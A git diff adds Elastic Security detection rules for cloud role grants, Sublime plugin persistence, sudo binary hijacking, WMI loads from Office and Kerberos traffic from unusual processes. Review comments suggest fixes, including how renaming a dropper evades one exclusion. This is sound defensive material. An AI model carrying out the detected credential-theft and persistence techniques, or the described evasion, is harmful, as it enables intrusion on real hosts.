"keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.Role_DisplayName.NewValue", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "88671231-6626-4e1b-abb7-6e361a171fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "88671231-6626-4e1b-abb7-6e361a171fbb_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_107.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_107.json new file mode 100644 index 00000000000..193d18c4820 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_107.json 
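Review bot: The selector `o365.audit.ModifiedProperties.Role_DisplayName.NewValue:"Global Administrator"` keys on a human-readable display name, which Microsoft has renamed before (the same role template has surfaced as `Company Administrator` in older audit records, as far as I can tell) and which can vary across tenants, so the rule may silently miss the exact grant it describes. If the integration exposes the role template identifier in `ModifiedProperties` that is a more stable selector; failing that, at least OR in the legacy display name. Also `note` is an empty string: a medium-severity alert on a tenant-wide privilege grant deserves a short triage guide (actor, source IP/session, whether a change ticket exists, and reverting the assignment while investigating), consistent with other rules in this package. Since the same content is published as `_103` and `_105`, whichever version is fixed should be carried to the others.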
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may create or modify the Sublime application plugins or scripts to execute a malicious payload each time the Sublime application is started.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Sublime Plugin or Application Script Modification", + "query": "file where host.os.type == \"macos\" and event.type in (\"change\", \"creation\") and file.extension : \"py\" and\n file.path :\n (\n \"/Users/*/Library/Application Support/Sublime Text*/Packages/*.py\",\n \"/Applications/Sublime Text.app/Contents/MacOS/sublime.py\"\n ) and\n not process.executable :\n (\n \"/Applications/Sublime Text*.app/Contents/*\",\n \"/usr/local/Cellar/git/*/bin/git\",\n \"/Library/Developer/CommandLineTools/usr/bin/git\",\n \"/usr/libexec/xpcproxy\",\n \"/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/Resources/DesktopServicesHelper\"\n )\n", + "references": [ + "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "88817a33-60d3-411f-ba79-7c905d865b2a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_105.json b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_105.json new file mode 100644 index 00000000000..467d70894cf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_105.json 
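Review bot: The `process.executable` exclusion only whitelists Homebrew git under `/usr/local/Cellar/git/*/bin/git`, which is the Intel prefix; on Apple Silicon Homebrew installs under `/opt/homebrew`, so a `git pull` inside a Packages directory alerts on one architecture and not the other, which reads as accidental noise rather than a detection. Suggest adding `"/opt/homebrew/Cellar/git/*/bin/git"` next to the existing entry. Note also that excluding `"/Applications/Sublime Text*.app/Contents/*"` means a plugin written by Sublime's own Python (for example via a package manager running inside the editor) is deliberately not surfaced; that trade-off is worth stating in `description` or a `note` so analysts do not assume full coverage of the persistence path.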
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Sudo Hijacking Detected", + "new_terms_fields": [ + "host.id", + "user.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.type:(\"creation\" or \"file_create_event\") and\nfile.path:(\"/usr/bin/sudo\" or \"/bin/sudo\") and not process.name:(docker or dockerd or pacman)\n", + "references": [ + "https://eapolsniper.github.io/2020/08/17/Sudo-Hijacking/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "88fdcb8c-60e5-46ee-9206-2663adf1b1ce", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 105 + }, + "id": "88fdcb8c-60e5-46ee-9206-2663adf1b1ce_105", + "type": "security-rule" +} \ No newline at end of file 
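Review bot: The exclusion `not process.name:(docker or dockerd or pacman)` trusts a field the attacker controls — `process.name` is just the basename of the executable, so a dropper named `pacman` writing `/usr/bin/sudo` bypasses the rule outright. Prefer full paths, e.g. `not process.executable:("/usr/bin/pacman" or "/usr/bin/dockerd" or "/usr/bin/docker")`, so only the real package manager is excluded; other distributions' package managers (dpkg, rpm, apk) will still produce a first-seen hit on upgrade, which is acceptable for a new-terms rule but should be mentioned in `false_positives`. Separately, `user.id` is a new-terms field but missing from `required_fields`, and the setup text links `fleet/8.10/agent-policy.html` where the rest of this package links `fleet/current/...`, which looks like an accidental pin.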
diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_107.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_107.json new file mode 100644 index 00000000000..674e0027760 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_107.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious image load (wmiutils.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where child processes are spawned via Windows Management Instrumentation (WMI). This technique can be used to execute code and evade traditional parent/child processes spawned from Microsoft Office products.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WMI Image Load from MS Office", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (?dll.name : \"wmiutils.dll\" or file.name : \"wmiutils.dll\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback 
for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_108.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_108.json new file mode 100644 index 00000000000..efe4d7b786f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_108.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious image load (wmiutils.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where child processes are spawned via Windows Management Instrumentation (WMI). This technique can be used to execute code and evade traditional parent/child processes spawned from Microsoft Office products.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.library-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WMI Image Load from MS Office", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (?dll.name : \"wmiutils.dll\" or file.name : \"wmiutils.dll\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default 
fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_109.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_109.json new file mode 100644 index 00000000000..804c72d3638 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_109.json 
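Review bot: Narrowing the index pattern to `logs-endpoint.events.library-*` should be checked against the `event.category : "driver"` branch of the query — if Elastic Defend driver-load events are routed to a different data stream, that branch is dead for Defend data and only Sysmon or Endgame can satisfy it, which is fine if intended but worth a sentence in `description` or `note`. The Office process list also omits `OUTLOOK.EXE`, which can host the same scripting path; consider `process.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSPUB.EXE", "MSACCESS.EXE", "OUTLOOK.EXE")` or a note explaining why it is left out (add-in noise is a plausible reason). Finally, `dll.name` is listed in `required_fields` while the query marks it optional with `?dll.name`; one of the two should give.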
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies network connections to the standard Kerberos port from an unusual process. On Windows, the only process that normally performs Kerberos traffic from a domain joined host is lsass.exe.", + "false_positives": [ + "HTTP traffic on a non standard port. Verify that the destination IP address is not related to a Domain Controller." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kerberos Traffic from Unusual Process", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction == \"egress\" and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and destination.address : \"*\" and\n not \n (\n process.executable : (\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\Amazon Corretto\\\\jdk1*\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Core\\\\tomcat-core\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files\\\\DBeaver\\\\dbeaver.exe\",\n \"?:\\\\Program 
Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.backend.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files\\\\Oracle\\\\VirtualBox\\\\VirtualBoxVM.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files\\\\Silverfort\\\\Silverfort AD Adapter\\\\SilverfortServer.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files (x86)\\\\SAP BusinessObjects\\\\tomcat\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program 
Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\vmnat.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"System\"\n ) and process.code_signature.trusted == true\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation 
Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "897dc6b5-b39f-432a-8d75-d3730d50c782_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_110.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_110.json new file mode 100644 index 00000000000..2be59b1359a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_110.json 
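Review bot: The investigation guide in `note` tells analysts to search for 4624 logon events "to the target host after the registry modification", but this rule fires on a network connection to port 88 and involves no registry modification, so the step reads as copied from another rule; suggest "searching for login events (for example, 4624) to the target host around the time of the alert". The identical text appears in the _110 copy of this rule in the next hunk and should be corrected in both (or in the upstream rule source, if these files are exported). The rest of the guide is consistent with the query, and the `false_positives` entry correctly warns that the rule keys on the port rather than the protocol.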
